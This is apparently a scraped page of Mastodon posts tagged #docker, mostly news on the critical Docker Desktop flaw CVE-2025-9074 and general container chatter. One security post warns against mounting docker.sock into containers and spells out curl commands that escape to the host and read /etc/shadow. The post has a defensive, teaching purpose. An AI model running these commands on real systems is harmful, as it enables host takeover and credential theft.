docker

Back Open Paginator
26.08.2025 12:16
linuxeasy (@linuxeasy@mastodon.uno)

BookLore è la web app open source che ti permette di leggere, organizzare e condividere libri e fumetti con supporto PDF, EPUB e CBZ. #Linux #Server #Docker #UnoLinux

linuxeasy.org/booklore-libreri




Show Original Post


26.08.2025 11:40
benzogaga33 (@benzogaga33@mamot.fr)

CVE-2025-9074 : cette faille critique dans Docker Desktop permet de pirater Windows it-connect.fr/cve-2025-9074-ce #ActuCybersécurité #Cybersécurité #Vulnérabilité #Windows #Docker #Apple




Show Original Post


26.08.2025 11:01
gtronix (@gtronix@infosec.exchange)

Portainer 2.33 LTS brings modernized UI, Helm enhancements, and experimental observability

Portainerhas released version 2.33 LTS, building on enhancements made since the previous 2.32 STS release.

alternativeto.net/news/2025/8/

#Docker




Show Original Post


26.08.2025 10:41
stephenharlow (@stephenharlow@mastodon.social)

My first experiment with (other than following @lightweight's amazing / installation instructions) works!
I've now got a minimal container serving an file which is transformed in the browser to HTML according to a stylesheet. And it's all running on the same cheap @hetzner VPS:
blog.harlow.net.nz/

(Here's the latest version of @lightweight's tutorial tech.oeru.org/install-nextclou).





Show Original Post


26.08.2025 10:11
pwaring (@pwaring@social.xk7.net)

Has anyone got reliable tips for improving the performance of Docker on Windows? One project has acceptance tests which run in about 30s on Linux but 3+ minutes on Windows. I've verified this on a Windows machine I keep around for testing. It's so slow that Windows devs don't want to run the test suite.

#docker




Show Original Post


26.08.2025 10:07
finestructure (@finestructure@mastodon.social)

OrbStack is getting better and better. If you're using on a , use OrbStack.





Show Original Post


26.08.2025 09:04
reynardsec (@reynardsec@infosec.exchange)

A grumpy ItSec guy walks through the office when he overhears an exchange of words.

devops0: I need to manage other containers on the node from my container, hmm...
devops1: Just mount /var/run/docker.sock into it and move on.

ItSec (walking by): Guys... a quick test. From inside that container, run:

curl -s --unix-socket /var/run/docker.sock http://localhost/containers/json 

If you get JSON back, then you've handed that container admin-level control of the Docker daemon - so please don't...

devops0: So what? What does it mean?

Let's learn by example. The Docker CLI talks to the Docker daemon over a UNIX socket at (by default) /var/run/docker.sock [1]. That socket exposes the Docker Engine's REST API. With it, you can list, start, stop, create, or reconfigure containers - effectively controlling the host via the daemon. Now, the oops pattern we seeing:

# Dangerous: gives the container full control of the Docker daemon
docker run -it -v /var/run/docker.sock:/var/run/docker.sock ubuntu:24.04

If an attacker gets any code execution in that container (RCE, webshell, deserialization bug, etc), they can pivot to the Docker host. Here's how in practice:

# 1) From the compromised container that "sees" docker.sock: create a "helper" container that bind-mounts the host root

# apt update && apt install -y curl

curl --unix-socket /var/run/docker.sock -H 'Content-Type: application/json' \
-X POST "http://localhost/containers/create?name=escape" \
-d '{
"Image": "ubuntu:24.04",
"Cmd": ["sleep","infinity"],
"HostConfig": { "Binds": ["/:/host:rw"] }
}'

# 2) Start it
curl --unix-socket /var/run/docker.sock -X POST http://localhost/containers/escape/start

From there, the attacker can shell in and operates on /host (add SSH keys, read secrets, drop binaries, whatever), or even chroots because why not:

# Read /etc/shadow of Docker Host using only curl, step 1:

curl --unix-socket /var/run/docker.sock -s \
-H 'Content-Type: application/json' \
-X POST http://localhost/containers/escape/exec \
-d '{
"AttachStdout": true,
"AttachStderr": true,
"Tty": true,
"Cmd": ["cat","/host/etc/shadow"]
}'

# Step 2, read output of previous command (replace exec ID with yours):
curl --unix-socket /var/run/docker.sock -s --no-buffer \
-H 'Content-Type: application/json' \
-X POST http://localhost/exec/1ec29063e5c13ac73b907f57470552dd39519bad293bf6677bedadaad9fcde89/start \
-d '{"Detach": false, "Tty": true}'

Keep in mind this isn't only an RCE issue: SSRF-style bugs can coerce internal services into calling local admin endpoints (including docker.sock or a TCP-exposed daemon).

And one more important point: we understand you may not like when texts like this include conditionals: if a container is compromised, if SSRF exists, then the socket becomes a bridge to owning the host. It's understandable. Our job, however, is to assume those "ifs" eventually happen and remove the easy paths for bad actors.

[1] docs.docker.com/reference/cli/
[2] docs.docker.com/engine/api/

Other grumpy stories:
1) infosec.exchange/@reynardsec/1
2) infosec.exchange/@reynardsec/1
3) infosec.exchange/@reynardsec/1

#docker #devops #containers #security #kubernetes #cloud #infosec #sre #linux #php #nodejs #java #javascript #programming #cybersecurity





Show Original Post


26.08.2025 08:40
jos1264 (@jos1264@social.skynetcloud.site)

Docker fixes critical Desktop flaw allowing container escapes – Source: securityaffairs.com ciso2ciso.com/docker-fixes-cri #rssfeedpostgeneratorecho #informationsecuritynews #ITInformationSecurity #SecurityAffairscom #CyberSecurityNews #PierluigiPaganini #SecurityAffairs #SecurityAffairs #CVE-2025-9074 #BreakingNews #SecurityNews #hackingnews #Security #hacking #docker




Show Original Post


26.08.2025 06:52
simsus (@simsus@social.tchncs.de)

#DockerDesktop: Kritische Sicherheitslücke erlaubt Host-Zugriff | Security heise.de/news/Docker-Desktop-K #Patchday #Docker #virtualization #Virtualisierung




Show Original Post


26.08.2025 05:28
Sempf (@Sempf@infosec.exchange)

I played in a little team with Valkerie and others looking at hypervisor escapes back forever ago. Hardcore shit, that.

Docker Fixes CVE-2025-9074, Critical Container Escape Vulnerability With CVSS Score 9.3

thehackernews.com/2025/08/dock

#docker #cve




Show Original Post


26.08.2025 01:15
jos1264 (@jos1264@social.skynetcloud.site)

Docker Fixes CVE-2025-9074, Critical Container Escape Vulnerability With CVSS Score 9.3 – Source:thehackernews.com ciso2ciso.com/docker-fixes-cve #rssfeedpostgeneratorecho #CyberSecurityNews #TheHackerNews #docker




Show Original Post


26.08.2025 00:32
securityaffairs (@securityaffairs@infosec.exchange)

#Docker fixes critical Desktop flaw allowing container escapes
securityaffairs.com/181545/sec
#securityaffairs #hacking




Show Original Post


1 ...390 391 392 393 394 395 396 397 398 399 400 ...438
UP